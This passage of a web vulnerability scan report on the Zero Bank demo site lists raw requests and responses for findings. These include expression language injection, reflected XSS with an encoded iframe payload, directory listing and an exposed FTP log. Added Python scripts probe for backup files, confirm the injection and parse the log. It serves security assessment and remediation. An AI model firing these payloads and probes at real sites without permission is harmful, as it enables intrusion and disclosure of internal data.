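The X-Scan-Memo headers name the engines behind these findings: File Extension Addition (faq.html.bak, index.html.old), File Extension Replacement (index.old), Site Search (debug.txt, server-status) and Directory Enumeration. Reproducing that outside the scanner is simple, but the check a practitioner actually wants is the guard against soft 404s: a site that answers 200 to every path would otherwise turn every candidate into a finding. The script below is an added example, not WebInspect's check database; the suffix lists are my own selection, and the fetch functions are constructed stand-ins in which only the three names the report found return 200.

```python
"""Backup and leftover-file check with a soft-404 guard (added example)."""
import hashlib
import secrets
from posixpath import splitext

# File Extension Addition appends a suffix; File Extension Replacement swaps
# the extension. These lists are my own selection.
ADDED_SUFFIXES = (".bak", ".old", ".orig", "~")
REPLACED_SUFFIXES = (".old", ".bak", ".txt")


def candidates(path: str) -> list[str]:
    """Candidate leftover names for one resource path."""
    stem, ext = splitext(path)
    names = [path + s for s in ADDED_SUFFIXES]
    if ext:
        names += [stem + s for s in REPLACED_SUFFIXES if s != ext]
    return names


def _fingerprint(path: str, body: str) -> str:
    # Drop the requested path so a soft-404 page that echoes it still matches.
    return hashlib.sha256(body.replace(path, "").encode()).hexdigest()


def probe(fetch, paths: list[str]) -> list[str]:
    """Return the paths that exist. `fetch(path)` returns (status, body).

    A baseline request for a name that cannot exist captures what this
    server returns for missing files; candidates whose 200 response matches
    that baseline are discarded."""
    missing = "/" + secrets.token_hex(8) + ".html"
    status, body = fetch(missing)
    soft404 = _fingerprint(missing, body) if status == 200 else None
    found = []
    for path in paths:
        status, body = fetch(path)
        if status == 200 and _fingerprint(path, body) != soft404:
            found.append(path)
    return found


# Constructed stand-in for the target: the three names the report found
# return 200, everything else is missing.
SITE = {
    "/faq.html.bak": (200, "<html>faq backup</html>"),
    "/index.html.old": (200, "<html>old index</html>"),
    "/index.old": (200, "<html>older index</html>"),
}


def fetch_hard_404(path: str):
    """Server that answers 404 for missing files."""
    return SITE.get(path, (404, "Not Found"))


def fetch_soft_404(path: str):
    """Server that answers 200 with an error page for missing files."""
    return SITE.get(path, (200, f"<html>Sorry, {path} was not found</html>"))


if __name__ == "__main__":
    paths = candidates("/faq.html") + candidates("/index.html")
    print(probe(fetch_hard_404, paths))
    print(probe(fetch_soft_404, paths))
```

Against a real target, replace the fetch function with one that issues the request; the rest is unchanged. A response that is not byte-identical but differs only in a timestamp or nonce would also need normalising before fingerprinting.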

Insecure Transport

Page: http://zero.webappsecurity.com:80/login.html

Request:
GET /login.html HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="37A656705626B4D1D64F6BFA191C2A08";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="281"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="43195029-31fc-44c5-af10-bee590481d2f";
X-Request-Memo: ID="8b6aca79-af50-417a-a722-ce1ee8309b42"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 7303
...TRUNCATED... </div>
<form id="login_form" action="/signin.html" method="post" class="form-horizontal">
...TRUNCATED...
Page: http://zero.webappsecurity.com:80/forgot-password.html

Request:
GET /forgot-password.html HTTP/1.1
Referer: http://zero.webappsecurity.com/login.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="35CF74765A8B6CFE70D16739EA0E6BFF";
PSID="37A656705626B4D1D64F6BFA191C2A08"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1bb49c48-30c0-4105-bc0f-17075fe9b329";
X-Request-Memo: ID="1c38d3f2-e914-4b49-add0-ec54a3a063e3"; sc="2"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:07 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 6246
...TRUNCATED...
<form id="send_password_form" action="/forgotten-password-send.html" method="post"
class="form-hor...TRUNCATED...

Web Server Misconfiguration: HTTP Basic Authentication

Page: http://zero.webappsecurity.com:80/manager/html

Request:
GET /manager/html HTTP/1.1
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/manager/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-RequestManager-Memo: Category="StateRequestor.Redirect"; TriggerID="ef3f998d-8124-4e90-b4b3-f9a91d1f6a3b"; sid="53";
smi="0"; sc="1"; ID="7a2b8d86-2551-4b54-8b44-9c6cf1856fd3";
X-Request-Memo: ID="a8959cac-20d1-40af-889e-9553f5e18bee"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 401 Unauthorized
Date: Mon, 10 Oct 2016 07:51:12 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/h...TRUNCATED...

Often Misused: Login

Page: http://zero.webappsecurity.com:80/forgot-password.html

Request:
GET /forgot-password.html HTTP/1.1
Referer: http://zero.webappsecurity.com/login.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="35CF74765A8B6CFE70D16739EA0E6BFF";
PSID="37A656705626B4D1D64F6BFA191C2A08"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1bb49c48-30c0-4105-bc0f-17075fe9b329";
X-Request-Memo: ID="1c38d3f2-e914-4b49-add0-ec54a3a063e3"; sc="2"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:07 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 6246
...TRUNCATED...
<form id="send_password_form" action="/forgotten-password-send.html" method="post"
class="form-hor...TRUNCATED...
Page: http://zero.webappsecurity.com:80/login.html

Request:
GET /login.html HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="37A656705626B4D1D64F6BFA191C2A08";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="281"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="43195029-31fc-44c5-af10-bee590481d2f";
X-Request-Memo: ID="8b6aca79-af50-417a-a722-ce1ee8309b42"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 7303
...TRUNCATED... </div>
<form id="login_form" action="/signin.html" method="post" class="form-horizontal">
...TRUNCATED...

Cross-Frame Scripting

Page: http://zero.webappsecurity.com:80/login.html

Request:
GET /login.html HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="37A656705626B4D1D64F6BFA191C2A08";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Qualified"; LinkKind="HyperLink";
Locations="Unspecified"; Source="ScriptExecution"; ThreadId="281"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="43195029-31fc-44c5-af10-bee590481d2f";
X-Request-Memo: ID="8b6aca79-af50-417a-a722-ce1ee8309b42"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 7303

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Log in</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
</div>
</div>
</div>
<div class="container">
<div class="top_offset">

<div class="row">
<div class="offset3 span6">
<div class="page-header">
<h3>Log in to ZeroBank</h3>
</div>
<form id="login_form" action="/signin.html" method="post" class="form-horizontal">
<div class="form-inputs">
<div class="control-group">
<label class="control-label" for="user_login">Login</label>
<div class="controls">
<input type="text" id="user_login" name="user_login" tabindex="1" autocomplete="off"/>
<i id="credentials" class="icon-question-sign" style="padding-left: 5px"></i>
</div>
</div>
<div class="control-group">
<label class="control-label" for="user_password">Password</label>
<div class="controls">
<input type="password" id="user_password" name="user_password" tabindex="2" autocomplete="off"/>
</div>
</div>
<div class="control-group">
<label class="control-label" for="user_remember_me">Keep me signed in</label>
<div class="controls">
<input type="checkbox" id="user_remember_me" name="user_remember_me" tabindex="3"/>
</div>
</div>
</div>
<div class="form-actions">
<input type="submit" name="submit" value="Sign in"
class="btn btn-primary" tabindex="4"/>
</div>
</form>
<a href="/forgot-password.html" tabindex="5">Forgot your password ?</a>
</div>
</div>
<script type="text/javascript">
$(function () {
$("#user_login").focus();
$("#credentials").tooltip({'trigger':'hover', 'title': 'Login/Password - username/password', placement : 'right'});
$("#login_form").submit(function(event) {
$(this).append('<input type="hidden" name="user_token" value="0fb2e347-fb59-4fb7-b6dc-40a1cc5acf76"/>');
});
});
</script>
</div>

...TRUNCATED...

Expression Language Injection


Page:

description

http://zero.webappsecurity.com:80/search.html?searchTerm=${5914%2b2593}

Request:
GET /search.html?searchTerm=${5914%2b2593} HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="80D1BCF5623CAAD9D1B2249893BE5591";
PSID="4FB1E28C3A3C661502F583F3EA8F6277"; SessionType="AuditAttack"; CrawlType="None";
AttackType="QueryParamManipulation"; OriginatingEngineID="d000c3f8-c0fa-4862-8097-613ac7b063fc"; AttackSequence="0";
AttackParamDesc="searchTerm"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="11310";
Engine="Expression+Language+Injection"; SmartMode="NonServerSpecificOnly"; AttackString="%24%7b5914%252b2593%7d";
AttackStringProps="Attack"; ThreadId="104"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="a721a744-6ef4-40d9-b1ee-1a6d5b22d327";
X-Request-Memo: ID="3aef1eda-bcd3-41d8-8dbc-121ca3149c17"; sc="1"; ThreadId="104";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:50 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Length: 7709
...TRUNCATED...s:</h2>
No results were found for the query: 8507
</div>
</div>
<d...TRUNCATED...
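The finding above can be re-checked offline with the following script. It is an added example, not part of the WebInspect report or of the ZeroBank application: it rebuilds the scanner's arithmetic probe (`${5914%2b2593}`, where `%2b` is `+`, which the server evaluated to 8507) and applies the decision rule a tester uses, namely that the computed sum appears in the page while the probe text itself does not. The response bodies are constructed around the report's truncated excerpt; `make_probe`, `verify` and the other names are the example's own.

```python
"""Offline verification of an Expression Language injection finding.

Added example; not part of the WebInspect report. The bodies below are
constructed around the report's truncated response excerpt.
"""
import html
import random
import re


def make_probe(a, b):
    """Return (raw_probe, query_value, expected_sum) for ${a+b}.

    '+' must travel as %2b: a literal '+' in a query string decodes to a
    space, which turns the expression into ${5914 2593} and never evaluates."""
    raw = f"${{{a}+{b}}}"
    return raw, raw.replace("+", "%2b"), a + b


def random_probe():
    """Fresh operands per request: a number that evaluates correctly twice is
    what separates evaluation from a figure that happens to be on the page."""
    return make_probe(random.randint(1000, 9999), random.randint(1000, 9999))


def request_line(query_value):
    """The request line the scanner sent, rebuilt for a given probe."""
    return f"GET /search.html?searchTerm={query_value} HTTP/1.1"


def el_evaluated(body, raw_probe, expected_sum):
    """Decide whether the server evaluated the expression.

    Positive only when the sum appears as a stand-alone number and the probe
    text is absent. html.unescape first, so a page that entity-encoded '$' and
    '{' on output (safe behaviour) is read as echoing, not evaluating."""
    text = html.unescape(body)
    if raw_probe in text:
        return False
    return re.search(rf"(?<![\d.]){expected_sum}(?![\d.])", text) is not None


# Constructed from the report's response to searchTerm=${5914%2b2593}.
EVALUATED_BODY = "s:</h2>\nNo results were found for the query: 8507\n</div>"
# Constructed: the same page from an application that does not evaluate input.
ECHOED_BODY = "s:</h2>\nNo results were found for the query: ${5914+2593}\n</div>"
# Constructed: the same page with the probe entity-encoded on output.
ENCODED_BODY = "s:</h2>\nNo results were found for the query: &#36;&#123;5914+2593&#125;\n</div>"


def verify(bodies_by_probe):
    """bodies_by_probe: {(a, b): response_body}. Every probe must evaluate,
    so one coincidental number cannot confirm the finding on its own."""
    results = []
    for (a, b), body in bodies_by_probe.items():
        raw, _, total = make_probe(a, b)
        results.append(el_evaluated(body, raw, total))
    return bool(results) and all(results)
```

Two details matter in practice. A single hit can be a coincidence (a four-digit number already present in the page), so confirm with two probes using fresh random operands and require both to evaluate. And the fix is not output encoding: the expression is evaluated before rendering, so user-controlled text must not reach any construct that evaluates `${...}` a second time.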

Medium Issues
Web Server Misconfiguration: Directory Listing
Page:

description

http://zero.webappsecurity.com:80/errors/

Request:
GET /errors/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="BB23AC8A7B9C89C3DE9576C0FEACCA3F";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10214"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="80f80983-ecf1-439a-863c-27a58b849768";
X-Request-Memo: ID="2d21df20-9bb0-436e-a9b2-bb11433be3dd"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:17 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Content-Type: text/html;charset=UTF-8
Content-Length: 1384
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
<html>
<head>
<title>Directory Listing For /errors/</title>
<STYLE><!--H1 {font-family:...TRUNCATED...s-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;...TRUNCATED...rial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></STYLE>
</head>
<body><h1>Directory Listing For /errors/ - <a href="/"><b>Up To /</b></a></h1><HR size="1" noshade="noshade"><table
width="100%" cellspa...TRUNCATED..."5" align="center">
<tr>
<td align="left"><font size="+1"><strong>Filename</strong></font></td>
<td align="center"><font size="+1"><strong>Size</strong></font></td>
<td align="right"><font siz...TRUNCATED...

Web Server Misconfiguration: Unprotected File


Page:

description

http://zero.webappsecurity.com:80/admin/WS_FTP.LOG

Request:
GET /admin/WS_FTP.LOG HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="DC2EF0E7C935D7C47528CB0D2E9C1565";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="60b8f839-2e70-4177-8e47-f305852be435"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="764"; Engine="Site+Search";
SmartMode="NonServerSpecificOnly"; ThreadId="87"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="c47c8ae6-5758-42e7-82e9-f1558a268886";
X-Request-Memo: ID="807fe938-5c65-4f99-b66a-76c6511855c4"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:38 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"504686-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Length: 504686
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/plain
10.1.1.233 10:28
10.1.1.233 10:28
10.1.1.233 08:34
blondbkgB.jpeg
10.1.1.233 08:34
boston.htm
10.1.1.233 08:34
choices.html
10.1.1.233 08:34
concbkg.jpeg
10.1.1.233 08:34
10.1.1.233 08:34
10.1.1.231 13:47

B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html


B C:\OADWEB~1\BOSTON\index.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.html
B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.htm
B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston water5.jpg
B c:\web\boston\ws_ftp.log <-- ...TRUNCATED...
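What the exposed log gives an attacker is easier to see once it is parsed. The script below is an added example, not from the report: it parses WS_FTP.LOG transfer lines (`mode local-path --> host remote-dir [remote-name]`, with `-->` for uploads and `<--` for downloads) and summarises the hosts, local directory layout and server-side paths they reveal. In the excerpt above that is the internal host `sunburn`, 10.1.1.x workstation addresses, the developer's `C:\Oad Web Stuff` tree and the `C:\old_repo\root\oad\incoming\lorenzo` repository path, in a 504686-byte file last modified in 2013. The leading date/time column on two sample lines and the last sample line (IP host, Unix-style remote directory) are constructed: the PDF extraction spilled the log's leading columns and remote file names into separate columns, so the exact original layout is an assumption.

```python
"""Parse WS_FTP.LOG transfer lines and summarise what they disclose.

Added example; not part of the WebInspect report. The sample log is
constructed around the report's excerpt (see the lead-in for assumptions).
"""
import re
from pathlib import PureWindowsPath

SAMPLE_LOG = r"""
2013.05.19 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
2013.05.19 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston
B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn C:\old_repo\root\oad\incoming\lorenzo\boston index.htm
B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn C:\old_repo\root\oad\incoming\lorenzo\boston boston.html
2013.05.18 13:47 B C:\web\boston\water5.jpg <-- 10.1.1.231 /boston water5.jpg
10.1.1.233 08:34
"""

LINE_RE = re.compile(
    r"^(?:(?P<stamp>\S+ \d{2}:\d{2}) )?"  # date/time column (assumed layout, optional)
    r"(?P<mode>[AB]) "                     # A = ASCII, B = binary transfer
    r"(?P<local>.+?) "                     # local path; may contain spaces
    r"(?P<arrow><--|-->) "                 # --> upload, <-- download
    r"(?P<host>\S+) "                      # remote host name or IP address
    r"(?P<remote>.+)$"                     # remote directory [remote file name]
)


def split_remote(remote, local):
    """Split 'remote_dir [remote_name]'. A trailing token with no path
    separator is taken as the remote file name; otherwise (name missing, as in
    the PDF-spilled lines) the local base name is used. Heuristic: assumes the
    remote directory itself contains no spaces."""
    parts = remote.rsplit(" ", 1)
    if len(parts) == 2 and not re.search(r"[\\/]", parts[1]):
        return parts[0], parts[1]
    return remote, PureWindowsPath(local).name


def parse_ws_ftp_log(text):
    """Return one dict per transfer line; column fragments that are not
    transfer lines (e.g. a bare 'ip time') are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["direction"] = "upload" if d["arrow"] == "-->" else "download"
        d["remote_dir"], d["remote_name"] = split_remote(d["remote"], d["local"])
        entries.append(d)
    return entries


def exposure_summary(entries):
    """What a reader of the file learns: internal hosts, the uploader's local
    directory layout, server-side repository paths and transfer volume."""
    return {
        "hosts": sorted({e["host"] for e in entries}),
        "local_dirs": sorted({str(PureWindowsPath(e["local"]).parent) for e in entries}),
        "remote_dirs": sorted({e["remote_dir"] for e in entries}),
        "uploads": sum(e["direction"] == "upload" for e in entries),
        "downloads": sum(e["direction"] == "download" for e in entries),
    }


if __name__ == "__main__":
    for key, value in exposure_summary(parse_ws_ftp_log(SAMPLE_LOG)).items():
        print(f"{key}: {value}")
```

The remediation is the same regardless of content: FTP client logs, editor backups and similar artefacts should never be inside the document root, and the `/admin/` path they sit under should not be reachable without authentication.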


Cross-Site Scripting: Reflected


Page:

description

http://zero.webappsecurity.com:80/forgotten-password-send.html

Request:
POST /forgotten-password-send.html HTTP/1.1
Referer: http://zero.webappsecurity.com/forgot-password.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="3CCA0F0168FF9A4F25516C3DEC652FEB";
PSID="92B4961E57F2D1571E4CFED9894AA305"; SessionType="AuditAttack"; CrawlType="None";
AttackType="PostParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="20";
AttackParamDesc="email"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105"; Engine="Cross+Site+Scripting";
SmartMode="NonServerSpecificOnly"; AttackString="John.Doe%2540somewhere.com%253c%2569%2546%2572%2541%
256d%2545%2520%2573%2552%2563%253d%2578%2553%2572%2546%2574%2545%2573%2554%252e%2573%2550%
2569%253e%253c%252f%2569%2546%2572%2541%256d%2545%253e"; AttackStringProps="Attack"; ThreadId="108";
ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="d20250ee-376e-4a1f-b945-e8cb9e81fb4d";
X-Request-Memo: ID="02d55fa9-b114-421f-93f2-90fd3d61ac52"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=2313C6AC
email=John.Doe%40somewhere.com%3c%69%46%72%41%6d%45%20%73%52%63%3d%78%53%72%46%74%45%73%
54%2e%73%50%69%3e%3c%2f%69%46%72%41%6d%45%3e&submit=Send%20Password
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:04:03 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=39
Connection: Keep-Alive
Content-Length: 5424
...TRUNCATED...ent to the following email: John.Doe@somewhere.com<iFrAmE sRc=xSrFtEsT.sPi></iFrAmE>
</div>
</div>
</div>
...TRUNCATED...

Web Server Misconfiguration: Unprotected File


Page:

description

http://zero.webappsecurity.com:80/include/common.inc

Request:
GET /include/common.inc HTTP/1.1
Referer: http://zero.webappsecurity.com/include/
Accept: */*
Pragma: no-cache
